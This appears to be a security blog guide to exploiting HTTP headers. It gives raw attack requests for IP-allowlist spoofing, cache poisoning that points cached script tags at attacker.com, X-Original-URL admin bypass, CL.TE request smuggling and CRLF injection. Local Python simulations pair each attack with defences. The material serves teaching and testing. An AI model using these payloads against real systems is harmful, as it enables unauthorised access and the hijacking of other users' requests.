HTTP headers are a goldmine for security researchers and bug bounty hunters. From basic misconfigurations to advanced exploitation techniques, understanding how servers, proxies and caches interpret headers, and which of them trust values the client can set, turns up significant vulnerabilities. This guide explores methods like custom header injection, cache poisoning, reverse proxy misconfigurations and request smuggling.
Read the full guide here: Exploiting HTTP Headers
You Should Know:
1. Custom Header Injection
Attackers add or override headers that the application treats as if its own infrastructure had set them. Example (each header is its own line on the wire):
GET / HTTP/1.1
Host: example.com
X-Forwarded-For: 127.0.0.1
User-Agent: Malicious-Browser
Impact: bypassing IP allowlists, rate limits or "internal only" checks that read the client address from X-Forwarded-For, and poisoning logs and audit trails with attacker-chosen values. This works only when the application trusts the header even though no proxy of its own appended it.
2. Cache Poisoning via Headers
The dangerous input here is usually not a caching directive (Cache-Control, Vary) but a header such as X-Forwarded-Host that the cache leaves out of its key ("unkeyed") while the application reflects it into the response, for example into absolute links or a script src. One request carrying the attacker's value gets cached and is then served to everyone who asks for the same URL:
GET / HTTP/1.1
Host: victim.com
X-Forwarded-Host: attacker.com
Mitigation: have the edge strip headers it does not set itself, never reflect them into cacheable responses, and if an input must influence the response, make it part of the cache key (send a matching `Vary`) so that one user's variant is not served to another.
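As an added example (not code from the original post), the following toy shared cache and origin show why a header the cache ignores but the application reflects poisons every later visitor, and three ways to stop it: keying on the header, stripping it at the edge, or not reflecting it. The cache, the two origins and the request shape are assumptions constructed for the demonstration.

```python
# Added example (not from the original post): unkeyed-header cache poisoning.
# The cache, origin functions and request format are assumptions for this demo.

def make_request(path="/", host="victim.com", extra=None):
    """Build a request as a plain dict; header names are case-sensitive here for simplicity."""
    headers = {"Host": host}
    headers.update(extra or {})
    return {"method": "GET", "path": path, "headers": headers}


class SharedCache:
    """Caches responses by (method, Host, path) plus any extra keyed headers,
    which is what a CDN does when the origin sends a matching Vary."""

    def __init__(self, keyed_headers=()):
        self.keyed_headers = tuple(keyed_headers)
        self.store = {}

    def fetch(self, request, origin):
        h = request["headers"]
        key = (request["method"], h.get("Host", ""), request["path"]) + tuple(
            h.get(name, "") for name in self.keyed_headers
        )
        if key in self.store:
            return self.store[key], True  # served from cache
        body = origin(request)
        self.store[key] = body
        return body, False


def vulnerable_origin(request):
    """Prefers X-Forwarded-Host when building absolute URLs (a common framework default)."""
    h = request["headers"]
    host = h.get("X-Forwarded-Host") or h["Host"]
    return f'<script src="https://{host}/static/app.js"></script>'


def hardened_origin(request):
    """Builds URLs only from Host, so X-Forwarded-Host cannot change the response."""
    return f'<script src="https://{request["headers"]["Host"]}/static/app.js"></script>'


def strip_unkeyed(request, names=("X-Forwarded-Host",)):
    """What the edge should do before caching: drop headers it did not set itself."""
    h = {k: v for k, v in request["headers"].items() if k not in names}
    return {**request, "headers": h}


def victim_sees(origin, keyed_headers=(), edge_strips=False):
    """Attacker primes the cache, then an ordinary user requests the same URL.
    Returns (body the victim gets, whether it came from the cache)."""
    cache = SharedCache(keyed_headers)
    attacker = make_request(extra={"X-Forwarded-Host": "attacker.com"})
    victim = make_request()
    if edge_strips:
        attacker, victim = strip_unkeyed(attacker), strip_unkeyed(victim)
    cache.fetch(attacker, origin)
    return cache.fetch(victim, origin)


if __name__ == "__main__":
    print("vulnerable:", victim_sees(vulnerable_origin))
    print("keyed on X-Forwarded-Host:", victim_sees(vulnerable_origin, ("X-Forwarded-Host",)))
    print("edge strips header:", victim_sees(vulnerable_origin, edge_strips=True))
    print("origin ignores header:", victim_sees(hardened_origin))
```

In the vulnerable run the victim receives a cached page whose script tag points at attacker.com. Keying on the header stops the cross-user spread but still lets the attacker poison their own variant, which is why stripping the header at the edge or ignoring it in the origin is the better fix.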
3. Reverse Proxy Misconfigurations
Front ends that pass client-supplied routing headers through to the back end let the client steer it. X-Original-URL and X-Rewrite-URL are honoured by some frameworks as the "real" request path, so a front-end rule that blocks /admin is bypassed when the back end rewrites the path from the header; X-Accel-Redirect is an nginx-internal response header that should never be accepted from, or forwarded to, a client. Test:
curl -H "X-Original-URL: /admin" http://target.com
Defense: strip these headers at the proxy from anything that is not a trusted hop, and enforce access rules on the back end against the path it actually serves rather than only at the front end.
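As an added example covering both section 1 (X-Forwarded-For trust) and section 3 (override headers), and not code from the original post, here is how a back end should derive the client address from X-Forwarded-For and what an edge should do with client-supplied override headers. The trusted proxy range, the allowlist, the override header list and the toy path-override function are assumptions; header names are assumed to be lowercased, as WSGI/ASGI frameworks normalise them.

```python
# Added example (not from the original post). Trusted ranges, header names and
# the toy back-end path override are assumptions for this demonstration.
import ipaddress

TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]  # assumed: our own edge tier
OVERRIDE_HEADERS = {"x-original-url", "x-rewrite-url", "x-forwarded-host", "x-accel-redirect"}
ADMIN_ALLOWLIST = ipaddress.ip_network("127.0.0.1/32")  # assumed "local only" rule


def is_trusted_proxy(addr):
    """True if addr parses as an IP inside one of our proxy ranges."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)


def client_ip_naive(peer, headers):
    """Vulnerable: takes the leftmost X-Forwarded-For entry, which the client wrote."""
    xff = headers.get("x-forwarded-for")
    return xff.split(",")[0].strip() if xff else peer


def client_ip_safe(peer, headers):
    """Consult X-Forwarded-For only when the TCP peer is one of our proxies, then
    walk the chain from the right (the entries our proxies appended) and stop at
    the first address that is not a trusted proxy. Assumes the edge always
    appends the real client address. A malformed entry is returned as-is and
    must fail closed in the caller."""
    if not is_trusted_proxy(peer):
        return peer
    chain = [h.strip() for h in headers.get("x-forwarded-for", "").split(",") if h.strip()]
    for hop in reversed(chain):
        if not is_trusted_proxy(hop):
            return hop
    return peer  # every entry was ours; nothing usable


def admin_allowed(peer, headers, resolver):
    """Allowlist check using the given client-IP resolver; unparsable => denied."""
    try:
        return ipaddress.ip_address(resolver(peer, headers)) in ADMIN_ALLOWLIST
    except ValueError:
        return False


def sanitize_at_edge(peer, headers):
    """Edge rule: override headers survive only if they arrived from a trusted hop."""
    if is_trusted_proxy(peer):
        return dict(headers)
    return {k: v for k, v in headers.items() if k not in OVERRIDE_HEADERS}


def served_path(request_path, headers):
    """Back-end behaviour some frameworks have: X-Original-URL replaces the path."""
    return headers.get("x-original-url", request_path)


if __name__ == "__main__":
    spoof = {"x-forwarded-for": "127.0.0.1, 203.0.113.9"}
    print("naive:", client_ip_naive("10.0.0.5", spoof), "safe:", client_ip_safe("10.0.0.5", spoof))
    print("admin via naive:", admin_allowed("10.0.0.5", spoof, client_ip_naive))
    print("admin via safe:", admin_allowed("10.0.0.5", spoof, client_ip_safe))
    print("path after edge:", served_path("/", sanitize_at_edge("203.0.113.9", {"x-original-url": "/admin"})))
```

The rightmost-untrusted walk is the standard fix: whatever the client prepends, the address our own proxy appended is the last one that is not ours. Stripping override headers at the edge is cheaper than auditing every back-end framework for which header names it honours.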
4. HTTP Request Smuggling
When a front-end and a back-end server disagree on which of `Content-Length` and `Transfer-Encoding` frames the body, the same byte stream is split into requests differently by each, and the tail of the attacker's body becomes the start of the next request on the shared connection (CL.TE when the front end uses Content-Length and the back end honours chunked encoding; TE.CL the other way round). A CL.TE request looks like this on the wire, with CRLF line endings that count toward Content-Length:
POST / HTTP/1.1
Host: target.com
Content-Length: 55
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: target.com
X-Ignore: X
The front end forwards the full 55-byte body. The back end reads the chunked body as ending at the empty chunk and treats everything after it as a new request. The next request on that connection is appended after "X-Ignore: X", so its request line is swallowed into that header and the back end serves GET /admin to whoever sent it.
Detection: Use tools like Burp Suite or OWASP ZAP, and confirm with a timing probe (a body the back end will wait on) before attempting a full desync.
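As an added example (not code from the original post), the parser below reads one constructed byte stream twice: once the way a front end that trusts Content-Length does, once the way a back end that honours Transfer-Encoding does. The two disagree about where the first request ends, which is the whole of the CL.TE desync. The sample stream and the strictness check are constructed here and are assumptions.

```python
# Added example (not from the original post): CL.TE desync shown with two framings
# of one byte stream. The stream below is constructed for the demonstration.

def split_headers(buf):
    """Return (request_line, headers dict with lowercase names, body_start) for the
    message at the start of buf, or None if the header block is incomplete."""
    end = buf.find(b"\r\n\r\n")
    if end < 0:
        return None
    lines = buf[:end].decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, end + 4


def read_chunked(buf, start):
    """Consume a chunked body and return the index just after the terminating CRLF.
    Raises ValueError on a truncated stream (buf.index), which is fine for the demo."""
    pos = start
    while True:
        line_end = buf.index(b"\r\n", pos)
        size = int(buf[pos:line_end].split(b";")[0], 16)
        pos = line_end + 2
        if size == 0:
            return buf.index(b"\r\n", pos) + 2  # skip the (empty) trailer section
        pos += size + 2  # chunk data plus its CRLF


def parse_stream(buf, prefer):
    """Split a stream into request lines. prefer='cl' mimics a front end that
    frames by Content-Length; prefer='te' mimics a back end that frames by chunked."""
    request_lines = []
    pos = 0
    while pos < len(buf):
        parsed = split_headers(buf[pos:])
        if parsed is None:
            request_lines.append("INCOMPLETE")
            break
        request_line, headers, body_start = parsed
        body_start += pos
        chunked = "chunked" in headers.get("transfer-encoding", "").lower()
        cl = headers.get("content-length")
        if prefer == "te" and chunked:
            body_end = read_chunked(buf, body_start)
        elif cl is not None:
            body_end = body_start + int(cl)
        elif chunked:
            body_end = read_chunked(buf, body_start)
        else:
            body_end = body_start
        request_lines.append(request_line)
        pos = body_end
    return request_lines


def is_ambiguous(headers):
    """Hardened servers reject a message carrying both framing headers instead of guessing."""
    return "transfer-encoding" in headers and "content-length" in headers


# Constructed sample: the attacker's request followed by an innocent user's request.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: target.com\r\nX-Ignore: X"
BODY = b"0\r\n\r\n" + SMUGGLED
ATTACK = (b"POST / HTTP/1.1\r\nHost: target.com\r\n"
          + b"Content-Length: %d\r\n" % len(BODY)
          + b"Transfer-Encoding: chunked\r\n\r\n" + BODY)
VICTIM = b"POST /search HTTP/1.1\r\nHost: target.com\r\nContent-Length: 3\r\n\r\nq=1"
STREAM = ATTACK + VICTIM


def front_end_view():
    return parse_stream(STREAM, "cl")


def back_end_view():
    return parse_stream(STREAM, "te")


if __name__ == "__main__":
    print("front end sees:", front_end_view())
    print("back end sees: ", back_end_view())
    print("ambiguous:", is_ambiguous(split_headers(ATTACK)[1]))
```

The front end sees the attacker's POST followed by the victim's POST /search. The back end sees the attacker's POST followed by GET /admin, into whose X-Ignore header the victim's request line has been absorbed, so the /admin response goes back on the victim's connection. The `is_ambiguous` check is the simplest server-side defence: refuse, or at least normalise to one framing, rather than let two components disagree.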
5. Security Header Bypasses
Missing or weak security headers do not create a vulnerability on their own, but they remove the browser-side defence that would contain one: without HSTS a user's first http:// visit can be intercepted and downgraded, and without a CSP (or with one that allows 'unsafe-inline' or any origin for scripts) an injected script runs unhindered. Check over HTTPS, since HSTS is only honoured on a TLS response and many servers only send it there:
curl -I https://example.com | grep -i "strict-transport-security"
Fix: send `Strict-Transport-Security` with a long max-age (and includeSubDomains) and a `Content-Security-Policy` that restricts script sources, ideally with nonces or hashes instead of 'unsafe-inline'.
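As an added example (not code from the original post), this audit takes the text `curl -I` prints and reports the HSTS and CSP weaknesses discussed above, rather than only checking that the headers exist. The one-year max-age threshold and the two sample responses are assumptions constructed for the demonstration.

```python
# Added example (not from the original post): audit HSTS and CSP values from a
# raw response header block. Threshold and sample responses are assumptions.
import re

MIN_HSTS_MAX_AGE = 31536000  # one year; assumed threshold, matching the HSTS preload requirement


def parse_raw_headers(raw):
    """Parse the output of `curl -I` into a dict of lowercase name -> value."""
    headers = {}
    for line in raw.splitlines()[1:]:  # first line is the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def audit_hsts(headers):
    hsts = headers.get("strict-transport-security")
    if hsts is None:
        return ["HSTS missing"]
    findings = []
    m = re.search(r"max-age=(\d+)", hsts, re.I)
    if not m:
        findings.append("HSTS has no max-age")
    elif int(m.group(1)) < MIN_HSTS_MAX_AGE:
        findings.append(f"HSTS max-age {m.group(1)} below {MIN_HSTS_MAX_AGE}")
    if "includesubdomains" not in hsts.lower():
        findings.append("HSTS lacks includeSubDomains")
    return findings


def audit_csp(headers):
    csp = headers.get("content-security-policy")
    if csp is None:
        return ["CSP missing"]
    directives = {}
    for part in csp.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    findings = []
    # script-src falls back to default-src when absent, as browsers do
    script = directives.get("script-src", directives.get("default-src"))
    if script is None:
        findings.append("CSP has neither script-src nor default-src")
    else:
        has_nonce_or_hash = any(t.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for t in script)
        if "'unsafe-inline'" in script and not has_nonce_or_hash:
            findings.append("script-src allows 'unsafe-inline' without nonce/hash")
        if "*" in script:
            findings.append("script-src allows any origin (*)")
    return findings


def audit(raw):
    headers = parse_raw_headers(raw)
    return audit_hsts(headers) + audit_csp(headers)


# Constructed sample responses, not captured from any real host.
WEAK = """HTTP/1.1 200 OK
Server: nginx
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' *
Strict-Transport-Security: max-age=300
"""
STRONG = """HTTP/1.1 200 OK
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
Content-Security-Policy: default-src 'none'; script-src 'self' 'nonce-abc123'
"""

if __name__ == "__main__":
    for name, raw in (("weak", WEAK), ("strong", STRONG)):
        print(name, "->", audit(raw) or "no findings")
```

Note that a policy combining 'unsafe-inline' with a nonce or hash is not flagged: CSP-capable browsers ignore 'unsafe-inline' in that case, and the combination is a common compatibility pattern.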
What Undercode Say:
HTTP headers are often overlooked but can be a critical attack surface. Always test for:
– Header Injection (CRLF in reflected values, Host and X-Forwarded-* override)
– Cache Poisoning (unkeyed inputs such as X-Forwarded-Host reflected into cached responses)
– Proxy Misconfigurations (honoured X-Original-URL / X-Rewrite-URL, internal IP and header leaks)
– Request Smuggling (CL.TE or TE.CL attacks)
Commands for Testing:
Check security headers (over HTTPS, otherwise HSTS is not sent):
curl -I https://example.com
Test for CRLF injection: a quoted "\r\n" inside a curl -H value is sent as literal backslashes, so inject URL-encoded CR/LF into a parameter the server reflects into a response header, such as a redirect target, and look for the injected header in the response:
curl -i "https://test.com/redirect?url=%0d%0aX-Injected:%20true"
Detect reverse proxy issues:
nmap -p 80,443 --script http-headers target.com
Tools to Use:
- Burp Suite (Manual testing)
- Nmap (Header scanning)
- OWASP ZAP (Automated checks)
Expected Output:
A detailed report on HTTP header vulnerabilities, including exploitation techniques, mitigation steps, and practical commands for security testing.
References:
Reported By: Yes We – Hackers Feeds